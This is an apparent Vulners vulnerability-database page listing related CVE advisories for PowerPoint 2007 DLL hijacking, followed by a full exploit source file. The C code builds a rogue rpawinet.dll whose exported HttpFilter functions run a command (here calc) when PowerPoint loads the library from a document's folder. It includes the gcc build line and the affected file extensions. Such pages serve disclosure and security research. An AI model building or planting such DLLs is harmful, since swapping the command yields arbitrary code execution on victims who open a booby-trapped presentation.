Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2010-3141 | 27 Aug 201018:10 | – | cve | |
| CVE-2010-3142 | 27 Aug 201018:10 | – | cve | |
| CVE-2010-3141 | 27 Aug 201018:10 | – | cvelist | |
| CVE-2010-3142 | 27 Aug 201018:10 | – | cvelist | |
| Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking | 24 Aug 201000:00 | – | exploitdb | |
| EUVD-2010-3141 | 7 Oct 202500:30 | – | euvd | |
| CVE-2010-3141 | 27 Aug 201019:00 | – | nvd | |
| CVE-2010-3142 | 27 Aug 201019:00 | – | nvd | |
| Microsoft Office Products Insecure Library Loading Vulnerability | 9 Sep 201500:00 | – | openvas | |
| Design/Logic Flaw | 27 Aug 201019:00 | – | prion |
10
/*
Exploit Title: Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll)
Date: August 25, 2010
Author: storm ([email protected])
Version: 2007 (12.0.6535.5002) SP2
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -shared -o rpawinet.dll PowerPoint-DLL.c
.odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx files are affected.
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() { hax(); }
DllExport void HttpFilterOpen() { hax(); }
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Aug 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 29.3
EPSS0.16311